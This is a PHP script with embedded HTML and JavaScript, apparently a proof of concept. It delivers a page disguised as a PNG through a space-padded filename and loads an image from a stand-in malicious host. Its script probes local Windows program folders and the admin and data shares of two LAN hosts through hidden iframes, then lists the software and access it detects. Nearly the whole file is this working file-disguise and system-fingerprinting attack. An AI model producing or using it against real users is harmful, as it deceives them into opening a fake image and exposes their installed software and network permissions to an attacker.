<?php
header('Content-Disposition: attachment; filename="imagen3.png                           .html"');
?>
<html>
<head><title>Analisis</title>

<style>
    table {border-collapse: collapse}
    td {border: solid 1px}
</style>

</head>
<body>
<img src="http://malicioso.example.net/filewin/1.jpg" height="100">


<script>
var datos = {
    "c:\\": {"indicio_de": "Windows"},
    "c:\\Program Files (x86)\\": {"indicio_de": "Windows 64 bits"},
    "c:\\program files (x86)\\LibreOffice 5\\": {"indicio_de": "LibreOffice 5"},
    "c:\\program files\\oracle\\VirtualBox\\": {"indicio_de": "VirtualBox"},
    "c:\\program files\\java\\jre\\": {"indicio_de": "Java Runtime Environment"},
    "c:\\program files\\java\\jre1.8.0_25\\": {"indicio_de": "Java RE 8.0_25"},
    "C:\\Program Files\\Java\\jre 1.6.0_02\\": {"indicio_de": "Java RE 6.0_02"},
    "C:\\Program Files\\Microsoft Office\\Office11\\": {"indicio_de": "Office 2003"},
    "C:\\Program Files\\Microsoft Office\\Office16\\": {"indicio_de": "Office 2016"},
    "C:\\Program Files\\Adobe\\Adobe Photoshop CS5\\": {"indicio_de": "Photoshop CS5"},
	"\\\\192.168.0.195\\users\\": {"indicio_de": "Carpeta Compartida Users en 192.168.0.195"},
	"\\\\192.168.0.195\\datos\\": {"indicio_de": "Carpeta Compartida Datos en 192.168.0.195"},
	"\\\\192.168.0.195\\programas\\": {"indicio_de": "Carpeta Compartida Programas en 192.168.0.195"},
	"\\\\192.168.0.195\\c$\\": {"indicio_de": "Permisos de admin (c$) sobre 192.168.0.195"},
	"\\\\192.168.0.195\\d$\\": {"indicio_de": "Permisos de admin (d$) sobre 192.168.0.195"},
	"\\\\192.168.0.196\\c$\\": {"indicio_de": "Permisos de admin (c$) sobre 192.168.0.196"}
};



function comprueba(fichero) {
    var elemento = document.createElement("iframe");
    elemento.style.display = "none";
    elemento.src = fichero;
    
    datos[fichero].cuenta = 0;
    datos[fichero].existe = false;
    
    elemento.onload = function() {
        datos[fichero].cuenta++;
        
        if (datos[fichero].cuenta == 1) {
            datos[fichero].existe = true;
            
            elemento.src = fichero + "#1";
        } else {
            datos[fichero].existe = false;
        }
    }
    
    document.body.appendChild(elemento);
}

function resultados() {
    var cabecera = document.createElement("h1");
    cabecera.innerHTML = "<br>Datos encontrados";
    document.body.appendChild(cabecera);
    
    var salida = document.createElement("table");
    
    var fila = salida.insertRow(-1);
    fila.style.backgroundColor = "lightblue";
    fila.insertCell().innerHTML = "Encontrado";
    fila.insertCell().innerHTML = "Indicio";
    
    for (var i in datos) {
        if (datos[i].existe) {
            fila = salida.insertRow(-1);
            fila.insertCell().innerHTML = datos[i].indicio_de;
            fila.insertCell().innerHTML = i;
        }
    }
    
    document.body.appendChild(salida);
}

for (var i in datos) {
    comprueba(i);
}

setTimeout(resultados, 1000);
</script>

</body>